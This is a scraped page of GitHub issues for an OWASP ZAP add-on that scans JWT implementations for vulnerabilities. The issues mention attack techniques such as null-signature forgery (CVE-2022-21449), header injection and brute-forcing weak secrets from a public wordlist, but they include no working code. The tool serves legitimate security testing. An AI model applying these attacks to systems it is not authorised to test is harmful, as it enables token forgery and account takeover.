sasanlabs / owasp-zap-jwt-addon Goto Github PK
View Code? Open in Web Editor NEWOWASP ZAP addon for finding vulnerabilities in JWT Implementations
Home Page: https://www.zaproxy.org/
License: Apache License 2.0
OWASP ZAP addon for finding vulnerabilities in JWT Implementations
Home Page: https://www.zaproxy.org/
License: Apache License 2.0
Is your feature request related to a problem? Please describe.
It would be great if the JWT add-on could check for JWT issues related to CVE-2022-21449.
Describe the solution you'd like
Implement a scan rule/check that can detect something similar to:
https://twitter.com/christophetd/status/1516878071785467904
Sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449)
Describe alternatives you've considered
N/A
Would you like to help fix this issue?
Not at this time.
Additional context
Nothing further.
https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/sharedutils -=> implementation("org.zaproxy.addon:commonlib:1.0.0")
Describe the bug
Currently this rule test on static files like (CSS, JS) which leads to false positive.
Expected behavior
Skip the test on static files
Would you like to help fix this issue?
Yes
To Reproduce
Steps to reproduce the behavior:
Is your feature request related to a problem? Please describe.
The scan rules present at https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks are not having header param injections mentioned at https://portswigger.net/web-security/jwt. There are few other attacks which may not be present in AttackVectors.
Describe the solution you'd like
Add the Attack vectors for the left over injections as described at https://portswigger.net/web-security/jwt
Describe the bug
As the options panel for the JWT addon is complex, we should add the help index for the addon so that users can see the help index there only and they don't need to go to the readme.md in the repository to understand the options panel.
Sample code changes
Help Index: https://github.com/SasanLabs/owasp-zap-fileupload-addon/tree/main/src/main/javahelp/org/sasanlabs/fileupload/resources/help
In https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/ui/JWTOptionsPanel.java implement a method:
@Override
public String getHelpIndex() {
return <name>;
}
Sample PR: https://github.com/SasanLabs/owasp-zap-fileupload-addon/pull/6/files
Glimpse of UI where the help will be shown
Testing the changes
build the addon by running
This addon should contain the ability to encode/decode JWT tokens found in the request, so that JWT tokens can be tested on fly
I'm new to ZAP and I'm having a problem understanding this plug-in.
Therefore, it would be nice if I knew the getting started tutorial instead of trying to understand the configuration.
I would love to create the tutorial if it could be included here.
Is your feature request related to a problem? Please describe.
Analyse the brute force attack with common passwords for jwt as per the following https://raw.githubusercontent.com/wallarm/jwt-secrets/master/jwt.secrets.list list.
Read more on https://lab.wallarm.com/meet-jwt-heartbreaker-a-burp-extension-that-finds-thousands-weak-secrets-automatically/
Is your feature request related to a problem? Please describe.
As JWT's should not be very long lived because of revocation issue hence an alert of low priority can be raised if such a case is found.
Need to analyse more on this and check if any other such validations are needed.
Is your feature request related to a problem? Please describe.
Currently i forget to checkin/update change log file and merge the PR and it is not right. so we can integrate an action which will not pass for a PR if changelog.md file is not modified.
https://github.com/marketplace/actions/changelog-checker is one github action i found and i think we can give it a try.
If this checker has some issues then we can write some common function to do the same as this is a generic problem and might be faced by many.
Related to: zaproxy/zaproxy#6049
https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/JWTActiveScanner.java should be renamed JWTActiveScanRule
or JwtActiveScanRule
Of course you don't have to conform to that since this is project is 3rd party, so close/address as you see fit. But it's a pretty simple change and helps bring consistency and clarity/specificity.
Is your feature request related to a problem? Please describe.
JWT option in fuzzer is not shown if request doesn't contains JWT pattern. There is no indication to the user that why JWT option is unavailable.
If JWT pattern was found in the request then:
To Reproduce
Go to any request which is not having JWT pattern and then visit the fuzzer screen.
Expected behavior
Add the behavior details that the fuzzer will only show the JWT option if request has the valid jwt format in Readme.md and also help index (we are building this in PR: #25)
Is your feature request related to a problem? Please describe.
Currently, we only handle JWT signed using HMAC or RSA but we have not handled the JWT's signed by Elliptic Curve ES384 etc.
Describe the solution you'd like
Testing the changes, in case some implementation/poc is required
build the addon by running
Is your feature request related to a problem? Please describe.
As the addon was made an year ago and there might be many new Vulnerabilities related to JWT are introduced. So we would like to analyse the new attack vectors and how can we incorporate those attack vectors in the addon.
Describe the solution you'd like
Look at the new blogs, bug bounties, other scan rules/add-ons/scanners to find out what we are missing and how can we incorporate them.
Code References
Attack vectors: https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks
JWT configuration
Go through readme for more information regarding the configuration.
Testing the changes, in case some implementation/poc is required
build the addon by running
Is your feature request related to a problem? Please describe.
As Scanners cannot add all the types of payloads into its execution but in case the user wants custom payloads/additional payloads to be included as part of the scanner, we have custom payloads for such requirement.
This is specifically useful for the case, where say a key is stolen or only allowed for test environments but due to some bug they are used to sign the production JWT's, then this can help the organization to validate in pen-tests etc.
This was suggested by @kingthorin . for more information visit: #11 (comment)
Describe the solution you'd like
Add support for custom payloads where users can add the HMAC keys or other keys which are well known and check if their implementation is vulnerable to those payloads.
Code Reference
PR where custom payloads are added: https://github.com/pulls?q=is%3Apr+author%3Akingthorin+archived%3Afalse+custom+payloads+is%3Aclosed
Code where custom payloads/keys can be used in JWT addon: https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks/SignatureAttack.java#L96
We might need to enhance it in case we want to add the RSA-based keys.
Testing the changes
build the addon by running
This issue is to track the inconsistency between truststore input and private key input.
Truststore takes input as pkcs12 format and private key input is PEM file.
Truststore input requires password where as private key input does.
in case users are facing trouble with this please add comment or thumbs up so that we can prioritise this issue.
thanks,
Karan
Is your feature request related to a problem? Please describe.
We have currently only handing JWS but we have not handled JWE so under this enhancement we are looking to add:
Code References
Attack vectors: https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks
Adding Support for parsing JWE:
Testing the changes
build the addon by running
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.